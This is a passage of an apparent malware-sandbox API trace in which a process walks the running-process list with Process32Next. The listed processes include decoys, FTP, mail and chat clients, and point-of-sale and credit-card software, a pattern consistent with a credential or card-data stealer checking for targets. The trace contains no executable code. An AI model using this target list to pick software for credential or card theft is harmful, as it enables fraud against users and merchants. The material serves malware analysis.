lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0149.330] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0149.331] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0149.334] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0149.336] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0149.338] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0149.340] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.342] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0149.344] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0149.346] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0149.347] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0149.400] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.402] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0149.404] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0149.405] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0149.407] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0149.409] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0149.411] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0149.412] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0149.414] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0149.416] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0149.417] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0149.419] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0149.421] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0149.422] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0149.424] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0149.426] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0149.427] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0149.429] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0149.431] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0149.432] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0149.434] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0149.505] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0149.507] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0149.510] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0149.512] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0149.514] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0149.516] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0149.518] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0149.521] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0149.524] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0149.527] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0149.530] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0149.533] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0149.535] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0149.538] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0149.583] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0149.585] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0149.587] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0149.589] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0149.592] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0149.594] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0149.596] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0149.598] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0149.601] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0149.603] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0149.605] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0149.607] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0149.610] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0149.612] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0149.614] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0149.671] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0149.719] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0149.721] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0149.723] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0149.725] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0149.727] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0149.729] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0149.732] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0149.734] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0149.736] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0149.738] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0149.740] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0149.742] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0149.744] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0149.746] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0149.748] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0149.750] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0149.753] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0149.766] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0149.768] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0149.770] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.773] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0149.775] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0149.778] CloseHandle 